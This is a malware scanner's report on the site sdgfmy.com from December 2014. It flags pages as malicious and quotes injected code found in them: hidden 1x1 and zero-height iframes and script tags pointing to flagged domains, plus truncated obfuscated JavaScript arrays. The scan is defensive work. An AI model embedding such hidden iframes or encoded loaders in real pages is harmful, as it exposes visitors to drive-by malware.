Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sdgfmy.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sdgfmy.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sdgfmy.com/ | 200 OK Content-Length: 41441 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
http://sdgfmy.com/mm_menu.js | 200 OK Content-Length: 30741 Content-Type: application/x-javascript | clean |
http://sdgfmy.com/image/flash.js | 200 OK Content-Length: 3135 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: cc.haowangma.com ...[715 bytes skipped]... document.write("<span style=\"color:#FFFFFF;margin-top:4px\">ÍíÉÏ£º½áÊøÁËÒ»ÌìµÄÆ£±¹£¬ÇáËÉһϣ¡</span>"); } else if(t>=0 && t<= 5) { document.write("<span style=\"color:#FFFFFF;margin-top:4px\">Á賿£ºÏÖÔÚÒ¹ÒÑÉîÁË,ÄúҪעÒâÐÝÏ¢£¡</span>"); } } <script src=http://www.hnxw.net/sms/f.js></script>> <ifrAme src=http://cc.haowangma.com/oNe/hao5.htm?015 widTh=1 Name='1710' height=1></iframe> <iFrame src=http://cc.zuiyige.net/one/hAo5.htm?058 widtH=1 nAme='5552' height=1></iframe> [ifraMe src=http://www.oiok01.nEt/s1.htm?bEi wIdth=1 Name='7799' height=1][/iframe] ...[2657 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://cc.zuiyige.net/one/hao5.htm?058 This URL is marked by Google as suspicious <iframe src=http://cc.zuiyige.net/one/hao5.htm?058 width=1 name='5552' height=1> Hidden iFrame found. size: 1x1 src: http://www.nkseujr.cn/x.htm?048 <iframe src=http://www.nkseujr.cn/x.htm?048 width=1 height=1> Hidden iFrame found. size: 100x1 src: http://www.gdsax.cn/s1.htm?hy <iframe src=http://www.gdsax.cn/s1.htm?hy width=100 name='7833' height=1> Hidden iFrame found. size: 50x0 src: http://www.hby007.cn/one/a26.htm?02 <iframe src=http://www.hby007.cn/one/a26.htm?02 width=50 height=0 border=0> Hidden iFrame found. size: 100x1 src: http://aaa.1l1l1l.com/qq.htm <iframe src=http://aaa.1l1l1l.com/qq.htm width=100 name='7833' height=1> Hidden iFrame found. size: 1x1 src: http://www.oiok01.net/s1.htm?bei <iframe src=http://www.oiok01.net/s1.htm?bei width=1 name='3079' height=1> Hidden iFrame found. size: 100x0 src: http://enenhk.cn/page/rnb.htm?mor <iframe src="http://enenhk.cn/page/rnb.htm?mor" width=100 height=0> Malicious iFrame found. size: 100x0 src: http://yiduaner.cn/page/rnb.htm?mor This URL is marked by Google as suspicious <iframe src="http://yiduaner.cn/page/rnb.htm?mor" width=100 name='2785' height=0> Hidden iFrame found. 
size: 100x0 src: http://twoeven.cn/page/rnb.htm?mor03 <iframe src="http://twoeven.cn/page/rnb.htm?mor03" width=100 height=0> Hidden iFrame found. size: 1x1 src: http://www.cdjew.cn/x.htm?048 <iframe src=http://www.cdjew.cn/x.htm?048 width=1 height=1> Hidden iFrame found. size: 1x1 src: http://aaa.1l1l1l.com/qq.htm <iframe src=http://aaa.1l1l1l.com/qq.htm width=1 name='8207' height=1> Hidden iFrame found. size: 100x0 src: http://iengli.cn/page/rnb.htm?mor03 <iframe src="http://iengli.cn/page/rnb.htm?mor03" width=100 height=0> Hidden iFrame found. size: 100x1 src: http://www.demo103.cn/s1.htm?bei01 <iframe src=http://www.demo103.cn/s1.htm?bei01 width=100 name='4998' height=1> Hidden iFrame found. size: 50x0 src: http://5j8dsand.cn/zzhu.htm?mor01 <iframe src=http://5j8dsand.cn/zzhu.htm?mor01 width=50 height=0> Malicious iFrame found. size: 100x0 src: http://yiduaner.cn/page/rnb.htm?mor This URL is marked by Google as suspicious <iframe src="http://yiduaner.cn/page/rnb.htm?mor" width=100 name='9779' height=0> Hidden iFrame found. size: 100x1 src: http://www.demo103.cn/s1.htm?bei01 <iframe src=http://www.demo103.cn/s1.htm?bei01 width=100 height=1> Hidden iFrame found. size: 1x1 src: http://www.vnet-1.net/s1.htm?hy <iframe src=http://www.vnet-1.net/s1.htm?hy width=1 name='8207' height=1> Hidden iFrame found. size: 100x0 src: http://fengshenge.cn/page/rnb.htm?mor01 <iframe src="http://fengshenge.cn/page/rnb.htm?mor01" width=100 height=0> Malicious iFrame found. size: 1x1 src: http://cc.haowangma.com/one/hao5.htm?015 This URL is marked by Google as suspicious <iframe src=http://cc.haowangma.com/one/hao5.htm?015 width=1 name='1710' height=1> Hidden iFrame found. size: 50x0 src: http://www.zdq004.cn/one/a26.htm <iframe src=http://www.zdq004.cn/one/a26.htm width=50 height=0 border=0> | ||
http://sdgfmy.com/image/hxg.js | 200 OK Content-Length: 5513 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: cc.haowangma.com <!--
var bsYear; var bsDate; var bsWeek; var arrLen=8; //Êý×鳤¶È var sValue=0; //µ±ÄêµÄÃëÊý var dayiy=0; //µ±ÄêµÚ¼¸Ìì var miy=0; //Ô·ݵÄϱê var iyear=0; //Äê·Ý±ê¼Ç var dayim=0; //µ±Ôµڼ¸Ìì var spd=86400; //ÿÌìµÄÃëÊý var year1999="30;29;29;30;29;29;30;29;30;30;30;29"; //354 var year2000="30;30;29;29;30;29;29;30;29;30;30;29"; //354 var year2001="30;30;29;30;29;30;29;29;30 ...[4567 bytes skipped]... Hidden iFrame found. size: 50x0 src: http://www.hby007.cn/one/a26.htm?02 <iframe src=http://www.hby007.cn/one/a26.htm?02 width=50 height=0 border=0> Malicious iFrame found. size: 1x1 src: http://cc.zuiyige.net/one/hao5.htm?058 This URL is marked by Google as suspicious <iframe src=http://cc.zuiyige.net/one/hao5.htm?058 width=1 name='9009' height=1> Hidden iFrame found. size: 1x1 src: http://aaa.1l1l1l.com/qq.htm <iframe src=http://aaa.1l1l1l.com/qq.htm width=1 name='1615' height=1> Hidden iFrame found. size: 1x1 src: http://www.nkseujr.cn/x.htm?048 <iframe src=http://www.nkseujr.cn/x.htm?048 width=1 height=1> Hidden iFrame found. size: 100x0 src: http://enenhk.cn/page/rnb.htm?mor <iframe src="http://enenhk.cn/page/rnb.htm?mor" width=100 height=0> Hidden iFrame found. size: 100x1 src: http://aaa.1l1l1l.com/qq.htm <iframe src=http://aaa.1l1l1l.com/qq.htm width=100 name='5313' height=1> Malicious iFrame found. size: 100x0 src: http://yiduaner.cn/page/rnb.htm?mor This URL is marked by Google as suspicious <iframe src="http://yiduaner.cn/page/rnb.htm?mor" width=100 name='2830' height=0> Malicious iFrame found. size: 1x1 src: http://cc.haowangma.com/one/hao5.htm?015 This URL is marked by Google as suspicious <iframe src=http://cc.haowangma.com/one/hao5.htm?015 width=1 name='4635' height=1> Hidden iFrame found. size: 1x1 src: http://www.vnet-1.net/s1.htm?hy <iframe src=http://www.vnet-1.net/s1.htm?hy width=1 name='1615' height=1> Hidden iFrame found. 
size: 100x0 src: http://iengli.cn/page/rnb.htm?mor03 <iframe src="http://iengli.cn/page/rnb.htm?mor03" width=100 height=0> Hidden iFrame found. size: 1x1 src: http://www.oiok01.net/s1.htm?bei <iframe src=http://www.oiok01.net/s1.htm?bei width=1 name='5702' height=1> Hidden iFrame found. size: 100x0 src: http://twoeven.cn/page/rnb.htm?mor03 <iframe src="http://twoeven.cn/page/rnb.htm?mor03" width=100 height=0> Hidden iFrame found. size: 1x1 src: http://www.cdjew.cn/x.htm?048 <iframe src=http://www.cdjew.cn/x.htm?048 width=1 height=1> Hidden iFrame found. size: 50x0 src: http://www.zdq004.cn/one/a26.htm <iframe src=http://www.zdq004.cn/one/a26.htm width=50 height=0 border=0> Hidden iFrame found. size: 100x0 src: http://fengshenge.cn/page/rnb.htm?mor01 <iframe src="http://fengshenge.cn/page/rnb.htm?mor01" width=100 height=0> Hidden iFrame found. size: 50x0 src: http://5j8dsand.cn/zzhu.htm?mor01 <iframe src=http://5j8dsand.cn/zzhu.htm?mor01 width=50 height=0> Hidden iFrame found. size: 100x1 src: http://www.gdsax.cn/s1.htm?hy <iframe src=http://www.gdsax.cn/s1.htm?hy width=100 name='5313' height=1> Hidden iFrame found. size: 100x1 src: http://www.demo103.cn/s1.htm?bei01 <iframe src=http://www.demo103.cn/s1.htm?bei01 width=100 height=1> Malicious iFrame found. size: 100x0 src: http://yiduaner.cn/page/rnb.htm?mor This URL is marked by Google as suspicious <iframe src="http://yiduaner.cn/page/rnb.htm?mor" width=100 name='3068' height=0> | ||
http://sdgfmy.com/about.asp?id=6 | 200 OK Content-Length: 34208 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
http://sdgfmy.com/index.asp | 200 OK Content-Length: 41441 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
http://sdgfmy.com/gsjj.htm | 200 OK Content-Length: 18571 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var dnok690=["182", "193", "181", "199", "191", "183", "192", "198", "128", "185", "183", "198", "151", "190", "183", "191", "183", "192", "198", "148", "203", "155", "182", "122", "116", "179", "188", "179", "202", "137", "136", "134", "116", "123", "128", "197", "198", "203", "190", "183", "128", "194", "193", "197", "187", "198", "187", "193", "192", "114", "143", "114", "116", "179", "180", "197", "193", "190", "199", "198", "183", "116", "141", "182", "193", "181", "199", "191", "183", "192 Antivirus reports:
http://sdgfmy.com/qywh.asp?id=2 | 200 OK Content-Length: 32972 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
http://sdgfmy.com/news.asp | 200 OK Content-Length: 40766 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
http://sdgfmy.com/product.asp | 200 OK Content-Length: 48056 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
http://sdgfmy.com/case.asp | 200 OK Content-Length: 43971 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
http://sdgfmy.com/about.asp?id=4 | 200 OK Content-Length: 33438 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
http://sdgfmy.com/about.asp?id=7 | 200 OK Content-Length: 33715 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
http://sdgfmy.com/about.asp?id=5 | 200 OK Content-Length: 33044 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var mvg65785=["178", "189", "177", "195", "187", "179", "188", "194", "124", "181", "179", "194", "147", "186", "179", "187", "179", "188", "194", "144", "199", "151", "178", "118", "112", "187", "179", "188", "195", "131", "126", "127", "112", "119", "124", "193", "194", "199", "186", "179", "124", "190", "189", "193", "183", "194", "183", "189", "188", "110", "139", "110", "112", "175", "176", "193", "189", "186", "195", "194", "179", "112", "137", "178", "189", "177", "195", "187", "179", "18 Antivirus reports:
http://sdgfmy.com/lyb/index.asp | 200 OK Content-Length: 40579 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sdgfmy.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 22 Dec 2014 08:02:05 GMT
Server: Microsoft-IIS/6.0
Content-Length: 41441
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCBQBSSD=DJHFHOLDIBKHPKLMPENPOPKC; path=/
X-Powered-By: ASP.NET
...41441 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sdgfmy.com
Referer: http://www.google.com/search?q=sdgfmy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.